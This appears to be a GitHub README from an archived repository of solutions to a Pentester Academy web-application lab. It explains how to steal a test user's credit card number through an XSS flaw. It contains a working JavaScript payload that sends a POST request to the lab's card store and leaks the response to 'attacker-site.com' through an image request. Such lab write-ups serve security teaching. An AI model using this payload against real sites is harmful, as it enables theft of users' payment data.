Skip to content
This repository has been archived by the owner on Jun 2, 2022. It is now read-only.

Latest commit

 

History

History
27 lines (19 loc) · 1.76 KB

TASK_15.md

File metadata and controls

27 lines (19 loc) · 1.76 KB
Raw

Task 15 [Try Now]

Objectives:

  1. Find John's Credit Card Number using an XSS vulnerability on this page
  2. Post the Credit Card Number to your Attacker Server

So this is pretty much same as TASK_14. Only the URL is changed and delivery method is changed

So the target URL is http://pentesteracademylab.appspot.com/lab/webapp/jfp/15/cardstore, and we have to send a POST XHR with user=john data

You can send the POST body in .send method of XHR object. See this example

const xhttp = new XMLHttpRequest();

xhttp.onreadystatechange = function () {
  if (this.readyState == 4 && this.status == 200) {
    new Image().src = "http://attacker-site.com?card=" + xhttp.responseText;
  }
};
xhttp.open("POST", "http://pentesteracademylab.appspot.com/lab/webapp/jfp/15/cardstore", true);
xhttp.setRequestHeader("Content-Type", "application/x-www-form-urlencoded");
xhttp.send("user=john");

For POC, Click Here